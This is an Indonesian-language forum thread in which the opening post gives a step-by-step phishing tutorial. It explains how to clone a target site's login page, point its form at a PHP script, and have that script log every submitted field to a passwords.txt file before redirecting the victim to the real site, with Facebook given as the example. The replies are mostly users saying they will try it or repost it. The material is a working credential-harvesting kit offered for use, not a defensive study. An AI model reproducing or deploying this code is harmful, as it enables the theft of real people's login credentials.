Page 1 of 1

Tutor phising

Posted: Sat Jul 24, 2010 1:17 pm
by anharku
1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:

--------------------------------------------------------------------------
<form action="RANDOM URL" method="post">

--------------------------------------------------------------------------
4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"
Code:

----------------------------------------------------------------------------------------
<?php
header("Location: http://RANDOM.COM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

---------------------------------------------------------------------------------------
7. ganti tulisan yg http://RANDOM.COM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama.

jangan lupe chmod 777 di file password.txt

moga bermanfaat yeee..

by:DNZ

hanya mindahin info artikel dari codenesia...sapa tahu ada yg belom baca atau belum tahu :circle:
sumber: http://codenesia.com/artikel/tutor-phising.aspx

Re: Tutor phising

Posted: Sat Jul 24, 2010 6:24 pm
by Nol Sembilan Tiga
ok ok master anhar.. tak cobain.. skalian gw post di blog ku bisa gak... :ngakak: :love:

Re: Tutor phising

Posted: Sat Jul 24, 2010 11:17 pm
by senotkj
oke kk...,
langsung coba ah.., :devil

Re: Tutor phising

Posted: Sat Jul 24, 2010 11:47 pm
by choiroel
perlu dicoba nih
:licik: :licik: :licik:

Re: Tutor phising

Posted: Wed Jul 28, 2010 10:06 am
by anharku
iya silahkan di coba :love:
boleh kok di pindahin ke blog masing2..... :kaca:

Re: Tutor phising

Posted: Wed Jul 28, 2010 2:43 pm
by batamcyber
makASih Om atas TeriTOruiaLnya.....

Re: Tutor phising

Posted: Wed Jul 28, 2010 11:11 pm
by anharku
ia sama2.. :circle:

Re: Tutor phising

Posted: Sat Jul 31, 2010 3:38 pm
by kpa
aku harus coba..

Re: Tutor phising

Posted: Tue Feb 07, 2017 1:41 am
by 021ada
tapi apa setiap situs yg kita jadikan bahan untuk web phising kita code php nya sama isi nya sprti itu smua suhu ?? atau setiap web itu kita harus membuat kode php nya sendiri ??